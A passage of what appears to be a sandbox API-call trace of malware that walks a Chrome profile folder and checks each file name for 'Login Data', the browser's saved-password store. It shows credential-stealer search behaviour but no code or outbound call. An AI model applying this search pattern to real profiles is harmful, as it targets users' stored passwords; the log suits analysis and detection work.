HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.859] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="previews_opt_out.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" [0162.859] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.859] GetProcessHeap () returned 0x8e0000 [0162.859] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.859] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db", lpSrch="Login Data") returned 0x0 [0162.859] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.859] GetProcessHeap () returned 0x8e0000 [0162.859] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.859] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x804795c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x804795c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x812c19c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="previews_opt_out.db-journal", cAlternateFileName="PREVIE~1.DB-")) returned 1 [0162.859] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.859] lstrlenW (lpString="\\") returned 1 [0162.859] GetProcessHeap () returned 0x8e0000 [0162.859] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.859] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.859] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.859] lstrlenW (lpString="previews_opt_out.db-journal") returned 27 [0162.859] GetProcessHeap () returned 0x8e0000 [0162.859] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fcdb8 [0162.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.859] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="previews_opt_out.db-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal" [0162.859] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.860] GetProcessHeap () returned 0x8e0000 [0162.860] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.860] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db-journal", lpSrch="Login Data") returned 0x0 [0162.860] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2b000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.860] GetProcessHeap () returned 0x8e0000 [0162.860] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0162.860] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8687f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x869fc2d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="QuotaManager", cAlternateFileName="QUOTAM~1")) returned 1 [0162.860] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.860] lstrlenW (lpString="\\") returned 1 [0162.860] GetProcessHeap () returned 0x8e0000 [0162.860] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.860] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.860] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.860] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.860] lstrlenW (lpString="QuotaManager") returned 12 [0162.860] GetProcessHeap () returned 0x8e0000 [0162.860] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925550 [0162.860] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.860] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="QuotaManager" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" [0162.860] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.860] GetProcessHeap () returned 0x8e0000 [0162.860] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.860] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager", lpSrch="Login Data") returned 0x0 [0162.860] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.860] GetProcessHeap () returned 0x8e0000 [0162.860] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.860] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8687f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86a48590, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QuotaManager-journal", cAlternateFileName="QUOTAM~2")) returned 1 [0162.861] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.861] lstrlenW (lpString="\\") returned 1 [0162.861] GetProcessHeap () returned 0x8e0000 [0162.861] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.861] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.861] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.861] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.861] lstrlenW (lpString="QuotaManager-journal") returned 20 [0162.861] GetProcessHeap () returned 0x8e0000 [0162.861] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x925550 [0162.862] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.862] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="QuotaManager-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal" [0162.862] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.862] GetProcessHeap () returned 0x8e0000 [0162.862] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.862] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal", lpSrch="Login Data") returned 0x0 [0162.862] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.862] GetProcessHeap () returned 0x8e0000 [0162.862] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.862] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f846500, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f846500, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="README", cAlternateFileName="")) returned 1 [0162.862] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.862] lstrlenW (lpString="\\") returned 1 [0162.862] GetProcessHeap () returned 0x8e0000 [0162.862] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.862] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.862] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.862] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.862] lstrlenW (lpString="README") returned 6 [0162.862] GetProcessHeap () returned 0x8e0000 [0162.862] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x925550 [0162.862] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.862] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="README" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README" [0162.862] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.862] GetProcessHeap () returned 0x8e0000 [0162.862] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.862] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\README", lpSrch="Login Data") returned 0x0 [0162.862] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.862] GetProcessHeap () returned 0x8e0000 [0162.862] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.862] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c3f38f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c404a60, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8b43, dwReserved0=0x0, dwReserved1=0x0, cFileName="Secure Preferences", cAlternateFileName="SECURE~1")) returned 1 [0162.862] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.863] lstrlenW (lpString="\\") returned 1 [0162.863] GetProcessHeap () returned 0x8e0000 [0162.863] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.863] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.863] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.863] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.863] lstrlenW (lpString="Secure Preferences") returned 18 [0162.863] GetProcessHeap () returned 0x8e0000 [0162.863] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xbe) returned 0x925550 [0162.863] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.863] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Secure Preferences" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" [0162.863] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.863] GetProcessHeap () returned 0x8e0000 [0162.863] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.863] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences", lpSrch="Login Data") returned 0x0 [0162.863] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.863] GetProcessHeap () returned 0x8e0000 [0162.863] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.863] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8218d350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8218d350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82271b90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shortcuts", cAlternateFileName="SHORTC~1")) returned 1 [0162.863] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.863] lstrlenW (lpString="\\") returned 1 [0162.863] GetProcessHeap () returned 0x8e0000 [0162.863] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.863] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.863] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.863] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.863] lstrlenW (lpString="Shortcuts") returned 9 [0162.863] GetProcessHeap () returned 0x8e0000 [0162.863] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xac) returned 0x925550 [0162.863] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.863] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Shortcuts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts" [0162.863] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.863] GetProcessHeap () returned 0x8e0000 [0162.864] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.864] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Shortcuts", lpSrch="Login Data") returned 0x0 [0162.864] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.864] GetProcessHeap () returned 0x8e0000 [0162.864] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.864] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8218d350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8218d350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x822e3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shortcuts-journal", cAlternateFileName="SHORTC~2")) returned 1 [0162.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.864] lstrlenW (lpString="\\") returned 1 [0162.864] GetProcessHeap () returned 0x8e0000 [0162.864] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.864] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.864] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.864] lstrlenW (lpString="Shortcuts-journal") returned 17 [0162.864] GetProcessHeap () returned 0x8e0000 [0162.864] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xbc) returned 0x925550 [0162.864] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") 